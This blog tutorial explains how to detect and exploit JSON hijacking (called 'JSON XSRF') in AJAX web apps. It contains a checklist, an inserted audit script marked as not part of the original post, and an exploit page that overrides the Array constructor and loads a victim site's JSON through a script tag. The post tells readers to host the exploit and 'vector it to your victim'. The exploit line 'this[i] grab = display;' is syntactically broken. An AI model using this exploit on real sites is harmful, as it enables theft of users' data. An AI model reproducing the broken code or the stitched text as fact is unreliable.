In our last post on JSON XSRF attacks we saw some basics of XSRF attacks. In this section we will look at how to find and exploit a JSON vulnerability. As mentioned in the previous post, a JSON vulnerability exists when the JSON data transfer format is used instead of the standard XML data transfer format, and that happens only in AJAX-based web applications. The following are the steps to find out whether a site is vulnerable or not.
- If the web application runs on AJAX, check whether the application's response type is JSON or JavaScript.
- Now determine whether a cross-domain request can be made or not. If yes, check the transferred parameters: if they are the same for each request, or they are predictable, then the web application is vulnerable.
Now an important point: JSON attacks can only be performed using the HTTP GET method. That means if the application uses POST instead of GET, you have to check whether it also supports the GET method; otherwise you can't perform the attack.
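The checklist above can also be run by a developer over request/response pairs recorded from their own application. The following is an added example, not code from the original post; the record fields (`url`, `methods`, `contentType`, `paramSamples`), the two relative paths and all sample values are constructed for illustration.

```javascript
// Added example: record shape and sample data are constructed, not taken from a real site.
const JSON_OR_SCRIPT = /^(?:application|text)\/(?:json|javascript|x-javascript)\s*(?:;|$)/i;

// Names of parameters whose value changed between recorded requests.
// A value that changes can still be guessable (a counter, a timestamp),
// so a non-empty result needs a manual look; an empty one is a clear finding.
function varyingParams(samples) {
  const names = new Set(samples.flatMap((s) => Object.keys(s)));
  return [...names].filter(
    (n) => new Set(samples.map((s) => String(s[n]))).size > 1
  );
}

// Apply the three conditions from the text to one recorded endpoint.
function auditEndpoint(ep) {
  const jsonOrScript = JSON_OR_SCRIPT.test(ep.contentType.trim());
  const getAllowed = ep.methods.some((m) => m.toUpperCase() === "GET");
  const varying = varyingParams(ep.paramSamples);
  const reasons = [];
  if (jsonOrScript) reasons.push("response type is JSON or JavaScript");
  if (getAllowed) reasons.push("endpoint answers HTTP GET");
  if (varying.length === 0) reasons.push("parameters are the same for each request");
  return { url: ep.url, atRisk: reasons.length === 3, reasons, varying };
}

// Constructed records: methods the endpoint accepted, the response
// Content-Type, and the parameters seen in two separate sessions.
const recorded = [
  { url: "http://example.com/someNavigation/data.json",
    methods: ["GET"], contentType: "application/json; charset=utf-8",
    paramSamples: [
      { page: "1", view: "nav", lang: "en", fmt: "json" },
      { page: "1", view: "nav", lang: "en", fmt: "json" } ] },
  { url: "/account/update.json",            // POST only, GET was rejected
    methods: ["POST"], contentType: "application/json",
    paramSamples: [{ id: "7" }, { id: "7" }] },
  { url: "/orders/list.json",               // carries a per-session value
    methods: ["GET", "POST"], contentType: "text/javascript",
    paramSamples: [
      { status: "open", token: "sample-a1" },
      { status: "open", token: "sample-b2" } ] },
];

const report = recorded.map(auditEndpoint);
console.log(JSON.stringify(report, null, 2));
```

Only the first record meets all three conditions; the third is reported with `token` as the parameter that still needs a manual check for predictability.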
Now it's time to understand how to attack. A site vulnerable to XSRF attacks can only be exploited using JavaScript. Suppose that after determining the vulnerability you found that the web application has 4 parameters, of which nearly all are either the same or predictable. Then basically you can exploit the web application using code which may look like the following:
<script>
function display(s)
{
    alert(s);
}
function Array()
{
    for (var i = 0; i < 4; i++)
        this[i] grab = display;
}
</script>
<script src="http://example.com/someNavigation/data.json"></script>
In the above example, data is coming in JSON format from example{dot}com. As found earlier there are 4 parameters, so we constructed an array object in which we defined the variable grab to capture the 4 parameters and send them to the display function. The display function will just display the grabbed parameters. Note that this is just an example script; the original code may vary depending upon the web application. Rather than displaying the grabbed parameters, you can also opt to write them somewhere for further reference. Now upload this script to your site and vector it to your victim.
This post might be a little tricky to understand for those who don't have any kind of experience in AJAX and JavaScript, but I hope most of you will understand it since I tried to keep it as simple as I can. In the next post on JSON XSRF attacks we will see its preventive measures. Till then, thanks for reading, have a nice time and keep visiting.